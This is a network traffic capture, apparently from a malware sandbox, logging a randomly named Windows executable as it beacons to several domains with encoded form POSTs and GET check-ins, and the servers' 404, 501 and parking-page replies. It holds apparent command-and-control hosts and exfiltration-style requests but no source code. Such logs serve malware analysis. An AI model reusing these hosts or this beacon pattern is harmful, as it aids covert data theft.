                                                                        Date: Thu, 07 Nov 2024 16:59:04 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID: 21 | Source IP: 192.168.2.7 | Source Port: 49862 | Destination IP: 128.65.195.180 | Destination Port: 80 | PID: 3872 | Process: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp: Nov 7, 2024 17:59:09.648832083 CET | Bytes transferred: 643 | Direction: OUT
                                                                        POST /293d/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.evoo.website
                                                                        Origin: http://www.evoo.website
                                                                        Referer: http://www.evoo.website/293d/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j=2ZmzkMINTYaaK+J4DKDO2kLt6i9Qesdx3EKIRFbAM2yBwaNolB9NFAYxo7nW885vYCifP5sYLzP4HQ70MvzDWKY31rDvUxqNbKcNSipoDdeJlEZqoQuQmlTFpsIcliIe0BMA7ugyEgED4tdMpgBHfQaFnMPiIi842cc/MEzN073xb+g/ICVsDUSfnFDGgnI/WU5e4iXMbNpCuNnyjQ==


                                                                        Session ID: 22 | Source IP: 192.168.2.7 | Source Port: 49863 | Destination IP: 128.65.195.180 | Destination Port: 80 | PID: 3872 | Process: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp: Nov 7, 2024 17:59:12.195035934 CET | Bytes transferred: 663 | Direction: OUT
                                                                        POST /293d/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.evoo.website
                                                                        Origin: http://www.evoo.website
                                                                        Referer: http://www.evoo.website/293d/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCeB3/xo3Q9NEAYxjbnXzc5wYCuXP8MYLzL4HV/0M/OxXaY1+LDXJhqNbKcNSjMDDZyJl0pqp0yPrFTa/8IcvCIa0BNV7sULEiMD4stMq1hARQaDjMO1OTB2uvMAUWD+0JSReIhdSgZAdFqkjHnw3BVKUV9G1AjtE6MojfG21ukbCLgqCjDL3Q9I/gdCqdA=


                                                                        Session ID: 23 | Source IP: 192.168.2.7 | Source Port: 49864 | Destination IP: 128.65.195.180 | Destination Port: 80 | PID: 3872 | Process: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp: Nov 7, 2024 17:59:14.736999989 CET | Bytes transferred: 1676 | Direction: OUT
                                                                        POST /293d/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.evoo.website
                                                                        Origin: http://www.evoo.website
                                                                        Referer: http://www.evoo.website/293d/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j=2ZmzkMINTYaaF+54AtXO+kLq5i9QFcd13EOIRBLQPCWB3NJoljlNDAYxq7nSzc4sYBepP8JvLxD4VH30d8WxOqY1jbDsUxqYbJkBSi8DDZyJl3xqgAuP41TFpsIYliIy0Fou7sQbEzsD4PFMrBBAZQaBmMO9OTN9uvgmUTXH0JqRf5c6GjBgHX66ql3h5gE7anhFr3bVBIwqn82aze5iALReOwzN20YwgSBZ/Nq/5ifNIFCjBKmSlDxrPKkyvJLCK62cbMHsn7To2nTPswNpCOyz6nEy6cOofti2X3PXAWlPrlQWR8uZynBb+XPszPp1NLLnT7kwCxnM7RC4Ng/pF9q70W4c1bxTRIAYO90zyx3DSDy9vzAPi4MkTmoTdSPL8DtkXpQ0iwf+goSXIn4z5/RkrPuUzbo93EneNyO70ze7uThX5TEnvXBi+gFnEkC3cfvPDXpJXjlCpBlE8VATrMJ8S16dB3cunaD4nY1rWh6gJzNwluqFzZiBDSxZVfPtLIdD7DsM/u5RUblER0CmVWrq9ZYQ+RWS+mAySHVRC/TdX0L4MQqmjpznMjoN3/8IYqpnC/6AqaGb7z2N/AEs6kk7pzxb7EVHpBIg8Cbmk5Q79hBTGTq96S2WyTQ2VcLIcCsUhu+6vRwKFGCgSuxveXNWHHMoUwKw5NZRkEDa4dtbPluEAPpx+uCq03krtswr56V5iP5Qvp1D0MOk7fHmoox+IyfwCtVWSh8lYCrlMGBGCfD5wNsvzfnZ4WiDc3UiR6qq5AkGyyIbYWByx7j3FeCFemhv5PC/3uQZoX0Rajcyf7LoPEoALwypfGPRScJkOk85+7rKRwGgqojVRdke1ZJoyryUpUYX1c4s37Eh582uwC6vqn8UXNwm/4IiYgMiwtDm0Rrl2EyhEx4rr1bLA7OVnMEcnO5CztrJAwS4hlUdxguJOLUpPycTj1dPW2GXJUHtL1th0Nu7Go9O7mHhZyttcirf6/x2rvWfiqGn2ZyfesH8Q [TRUNCATED]


                                                                        Session ID: 24 | Source IP: 192.168.2.7 | Source Port: 49865 | Destination IP: 128.65.195.180 | Destination Port: 80 | PID: 3872 | Process: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp: Nov 7, 2024 17:59:17.387095928 CET | Bytes transferred: 389 | Direction: OUT
                                                                        GET /293d/?7j=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGQY4I1bDlFW6+Qsk+eyldD4LupDRErgy15HSDrpN9gAoL/hEh+9gUTgMo&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.evoo.website
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Timestamp: Nov 7, 2024 17:59:19.906847000 CET | Bytes transferred: 458 | Direction: IN
                                                                        HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 16:59:19 GMT
                                                                        Server: Apache/2.4.25 (Debian)
                                                                        Content-Length: 278
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


                                                                        Session ID: 25 | Source IP: 192.168.2.7 | Source Port: 49866 | Destination IP: 217.70.184.50 | Destination Port: 80 | PID: 3872 | Process: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp: Nov 7, 2024 17:59:25.119571924 CET | Bytes transferred: 658 | Direction: OUT
                                                                        POST /vdvc/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.astorg-group.info
                                                                        Origin: http://www.astorg-group.info
                                                                        Referer: http://www.astorg-group.info/vdvc/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j=0O14lEhnQB07F8faMZiTwvnYQS/azrlFOzpPgq1sZ+LzCgcF/clKSXpL7MiHO6Q2wc2KbesDcdWl9dMliuKKRPdqXJEWDdcQbyViYA+BDJlLF5aOngx5JLLiredu/O0TQHA3ngssGz/CDdyTqRl55EOVugZhpAynuUj4lD8uZSQMfqzB+AgW9jZPxZEtoamhXPL7uW/MRTlXbc+56A==
                                                                        Timestamp: Nov 7, 2024 17:59:25.928353071 CET | Bytes transferred: 608 | Direction: IN
                                                                        HTTP/1.1 501 Unsupported method ('POST')
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:59:25 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                        Session ID: 26 | Source IP: 192.168.2.7 | Source Port: 49867 | Destination IP: 217.70.184.50 | Destination Port: 80 | PID: 3872 | Process: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp: Nov 7, 2024 17:59:27.664902925 CET | Bytes transferred: 678 | Direction: OUT
                                                                        POST /vdvc/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.astorg-group.info
                                                                        Origin: http://www.astorg-group.info
                                                                        Referer: http://www.astorg-group.info/vdvc/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZIzzMhsFw5JKRXpLjciCTKQowc64bakDcZ2l9YwljZ+LRfdSMZFwdtcQbyViYA67DJ9LEJKOmCZ6ErLjseduyu0XQHAFnhAGGx3CDYWTrDN6wEOThAYq4Qb9jVT2pV4YByYsacyjkis6jyh01bgb/87UVOPjj0LtOkA9WOf9s39ydjUvuyAF8iHIHlZrdUA=
                                                                        Timestamp: Nov 7, 2024 17:59:28.457751036 CET | Bytes transferred: 608 | Direction: IN
                                                                        HTTP/1.1 501 Unsupported method ('POST')
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:59:28 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        27 | 192.168.2.7 | 49869 | 217.70.184.50 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:59:30.212539911 CET | 1691 | OUT | POST /vdvc/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.astorg-group.info
                                                                        Origin: http://www.astorg-group.info
                                                                        Referer: http://www.astorg-group.info/vdvc/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j= [TRUNCATED]
                                                                        Nov 7, 2024 17:59:31.018398046 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:59:30 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        28 | 192.168.2.7 | 49870 | 217.70.184.50 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:59:32.748753071 CET | 394 | OUT | GET /vdvc/?7j=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfNZBZZEaN8IgdCZSECanEbYOAZ+JnzF5T5/sjPpe9MQhZicEiQ4HPQfz&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.astorg-group.info
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:59:33.567106962 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 07 Nov 2024 16:59:33 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Security-Policy: default-src 'self'; script-src 'nonce-7b3ad3d31f844dc88731ea946a918ad1';
                                                                        Vary: Accept-Language
                                                                        Data Ascii: 93a<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-7b3ad3d31f844dc88731ea946a918ad1';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>astorg-group.info</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article
                                                                        Nov 7, 2024 17:59:33.567126036 CET | 1236 | IN | Data Raw: (hex dump omitted; decoded text follows)
                                                                        Data Ascii: class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?sea
                                                                        Nov 7, 2024 17:59:33.567140102 CET | 185 | IN | Data Raw: (hex dump omitted; decoded text follows)
                                                                        Data Ascii: ('clicker').addEventListener('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'astorg-group.info'); }); });</script></main></div> </body></html>
                                                                        Nov 7, 2024 17:59:33.567148924 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        29 | 192.168.2.7 | 49871 | 3.33.130.190 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:59:38.729836941 CET | 637 | OUT | POST /0m8a/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.fiqsth.vip
                                                                        Origin: http://www.fiqsth.vip
                                                                        Referer: http://www.fiqsth.vip/0m8a/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j=t1cnTZ5xaz4ZGaUgzKPTEaSpXE3fCQTJxhbg1FkUALMc9D/4KKtzLvqnm5ZNUP58ajNNarsbK6QB+zkg7/1pv4zck/BQb59ByxNPy7Qcf3pvNI/TZ7S9G3zQGITE3MySP65vRwf0bK8b5VfH/pJ/ltaIloNKXZfNYiJEoIhM+U4Y3Ksi7Cd9cZRHzo0yWUHrrR1/GlzTJ8SbptPXXg==


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        30 | 192.168.2.7 | 49872 | 3.33.130.190 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:59:41.271070004 CET | 657 | OUT | POST /0m8a/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.fiqsth.vip
                                                                        Origin: http://www.fiqsth.vip
                                                                        Referer: http://www.fiqsth.vip/0m8a/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZoc+iP4JLtzMvqn+JZEQP5NajxFapIbK6EB+z0g4IhquozavfBoUZ9ByxNPy7EifxBvN87TfvG+YnzTPoTEzMyWP65BR0/ebM4b5UvH+4J+qtaO44MlEJihZSdvkYpW+Hsi7ctAhgRRCIp83qQEByaepQxnLHHyWL3xk/uTBazCIwRlc1d2cm4rdXtFtZ8=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        31 | 192.168.2.7 | 49873 | 3.33.130.190 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:59:43.825514078 CET | 1670 | OUT | POST /0m8a/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.fiqsth.vip
                                                                        Origin: http://www.fiqsth.vip
                                                                        Referer: http://www.fiqsth.vip/0m8a/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j= [TRUNCATED]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        32 | 192.168.2.7 | 49874 | 3.33.130.190 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:59:46.378237963 CET | 387 | OUT | GET /0m8a/?UvgPX=o0HdzhbpI6gx&7j=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo4fbiPNZTItUz1VN35oCbCkoE872J7CJYymsP5Px3u6hB+1hbmngRsUR HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.fiqsth.vip
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:59:48.111644983 CET | 417 | IN | HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 16:59:48 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 277
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UvgPX=o0HdzhbpI6gx&7j=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo4fbiPNZTItUz1VN35oCbCkoE872J7CJYymsP5Px3u6hB+1hbmngRsUR"}</script></head></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        33 | 192.168.2.7 | 49875 | 3.33.130.190 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:59:53.217937946 CET | 649 | OUT | POST /ezyn/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.bio-thymus.com
                                                                        Origin: http://www.bio-thymus.com
                                                                        Referer: http://www.bio-thymus.com/ezyn/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j=EnYTLsMVnAFLxaeKOZ83dW1fz95ZqcT5JhZPQto5bY4b19LibZDC2Y+0XTeIA//Oa0FI0if59ih3Gz9TKfAsNv4VB2Av8JMyXdCBw8pQezV+I3nQWoNybS4+VTYoUhu7iLB8rUccmivAzcuwc5LEzS3MRXWywUB998Lf9oHSJ8zhzJUfhUnRv4bcDkLTww8fK8C5zSAP8f/75kSvGQ==


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        34 | 192.168.2.7 | 49876 | 3.33.130.190 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:59:55.768888950 CET | 669 | OUT | POST /ezyn/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.bio-thymus.com
                                                                        Origin: http://www.bio-thymus.com
                                                                        Referer: http://www.bio-thymus.com/ezyn/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j=EnYTLsMVnAFL3KuKJ+Q3IG1cqN5Z9MT9JhFPQoQPbrcbyc7iacvC1Y+0czeNE//7azNA0jj59i13GztTNocjN/4tJWAXypMyXdCBw4B+e19+LGXQWK1xHC4/BDYoQhu/iLBerVBzmgXAzZSwSILH6S2JJ3Xw1xcF7uzm4Zj2AeH42/V972r9xpjnHmvlnWhqI9Gh+w0ujoaR02zrQvBbopg5tGEiu2+KYfhQNPA=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        35 | 192.168.2.7 | 49877 | 3.33.130.190 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:59:58.375539064 CET | 1682 | OUT | POST /ezyn/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.bio-thymus.com
                                                                        Origin: http://www.bio-thymus.com
                                                                        Referer: http://www.bio-thymus.com/ezyn/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Ascii: 7j=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 [TRUNCATED]


                                                                        Session ID: 36
                                                                        Source IP: 192.168.2.7
                                                                        Source Port: 49878
                                                                        Destination IP: 3.33.130.190
                                                                        Destination Port: 80
                                                                        PID: 3872
                                                                        Process: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp: Nov 7, 2024 18:00:01.173201084 CET, Bytes transferred: 391, Direction: OUT
                                                                        Data:
                                                                        GET /ezyn/?7j=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKN8+Alsd/uAlfqbny7J4c2YDLjDocbldGRQwWRw5cBSMls9XvUBQui7N&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.bio-thymus.com
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Timestamp: Nov 7, 2024 18:00:01.690964937 CET, Bytes transferred: 417, Direction: IN
                                                                        Data:
                                                                        HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 17:00:01 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 277
                                                                        Connection: close
